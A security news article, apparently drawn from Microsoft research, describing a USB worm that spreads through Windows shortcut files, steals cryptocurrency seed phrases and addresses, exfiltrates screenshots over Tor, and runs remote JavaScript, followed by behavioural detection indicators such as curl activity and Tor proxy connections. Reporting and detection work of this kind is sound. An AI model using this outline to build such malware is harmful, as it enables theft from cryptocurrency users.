USB worm spreads crypto-stealing malware via Windows shortcut files

At a glance:

• USB drives distributing LNK files are the primary infection vector for this malware
• Clipboard-stealing functionality targets cryptocurrency wallet addresses and seed phrases
• Tor network usage enables covert communication and command-and-control operations

Infection Mechanism

The malware propagates through USB drives by exploiting Windows shortcut (LNK) files. When a victim opens an infected LNK file, the malware executes and initiates a local scan for document files. It then replaces legitimate documents with malicious shortcuts bearing identical names, ensuring execution when users attempt to access them. A scheduled task monitors for new USB connections, copying the malware to removable drives and creating additional LNK files. This self-replicating cycle allows the worm to spread across networks via physical media.

The infection process leverages Microsoft's Windows API to hide its activity. After initial execution, the malware establishes communication with a command-and-control (C2) server via a Tor onion address (.ONION). It creates a scheduled task to persist on the system, ensuring reactivation after reboots. The worm's propagation relies on social engineering to trick users into opening LNK files, combined with technical exploitation of Windows' handling of shortcut files.

Data Stealer Capabilities

The malware's stealer component monitors clipboard contents every 0.5 seconds for cryptocurrency-related data. It targets 12-word and 24-word BIP39 seed phrases, Ethereum private keys, Bitcoin wallet addresses (including legacy, P2SH, Bech32, and Taproot formats), Tron, and Monero addresses. The attackers carefully select targeted addresses to mimic their own wallet formats, reducing the likelihood of users noticing fraudulent transactions.

In addition to clipboard monitoring, the malware captures five screenshots every 10 seconds and exfiltrates them via Tor using the curl tool. This visual data collection allows attackers to observe user activity, including potential wallet interfaces or private key entry. The stealer also supports remote code execution, downloading and executing JavaScript payloads from the C2 server upon receiving an EVAL command. This capability enables attackers to deploy additional tools or escalate privileges on compromised systems.

Security Recommendations

Microsoft researchers emphasize behavioral analysis as the primary detection method, as traditional signature-based tools may miss this threat. Security teams should monitor for suspicious process activity involving wscript.exe, cscript.exe, curl, PowerShell, and cmd.exe. Unusual child processes spawned by these executables, along with connections to localhost:9050 (Tor proxy) or Tor network activity, are strong indicators of infection.

Organizations should implement advanced threat detection solutions that analyze process behavior rather than relying solely on known malware signatures. The Picus whitepaper highlights the importance of breach and attack simulation tests to validate security controls. Given the malware's Tor-based communication, network monitoring for Tor proxy usage and onion address connections is critical. Users should also be educated about the risks of opening unsolicited LNK files from USB drives, particularly those containing cryptocurrency-related content.